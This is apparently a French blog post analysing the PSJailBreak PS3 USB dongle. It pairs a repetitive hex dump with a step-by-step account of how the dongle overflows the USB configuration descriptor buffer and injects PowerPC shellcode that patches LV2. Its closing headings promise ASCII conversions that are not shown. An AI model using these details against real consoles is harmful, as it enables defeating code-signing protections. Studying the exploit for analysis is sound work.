04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
00 FE 01 02 00 09 04 00 00 00 FE 01 02

Alors qu’est-ce que cela signifie ? Disane l’a résumé ci-dessous:

Il s’agit du code PowerPC, Shell Code, qui est injectée. Le meilleur moyen serait d’utiliser le LV2 et cela afin de comprendre comment le dongle réalise son exploit d’OverFlow de la pile sur le buffer USB de la PS3. Après cela, il sera reproductible sur n’importe quel FirmWare, et tout les modèles de PS3.

L’ID du JIG est surement programmer pour déclencher du code qui déborde le Descripteur de Configuration et qui injecte le Shell Code après que le code soit exécuté. Le Shell Code patche le LV2 pour lancer des FSelfs et d’autres choses que je n’ai pas encore remarqué…

Voici un possible fonctionnement du PSJailBreak :

* Le PSJailBreak est inséré.

* Il se connecte avec le Host (PS3) et envoie 09 02 12 00 01 00 00 80 avec tout les bits du premier paquet de 0008 à 00EFF.

* La pile est débordé et la PS3 exécute le code du paquet.

* Le ATMega envoie une commande de déconnexion USB.

* Ces trois dernières étapes sont répétées trois fois.

* Il se connecte avec l’hôte et envoie 09 02 4D 0A 01 01 00 80 plus les bits du second paquet de 0008 à 0A4C.

* La pile est débordé et la PS3 exécute le code du paquet.

* L’ATMega envoie une commande de déconnexion USB.

* Ces trois dernières étapes sont répétées deux fois.

Ainsi que les deux Codes Hexadécimal convertit en ASCII :

Première Partie

Seconde Partie

En entier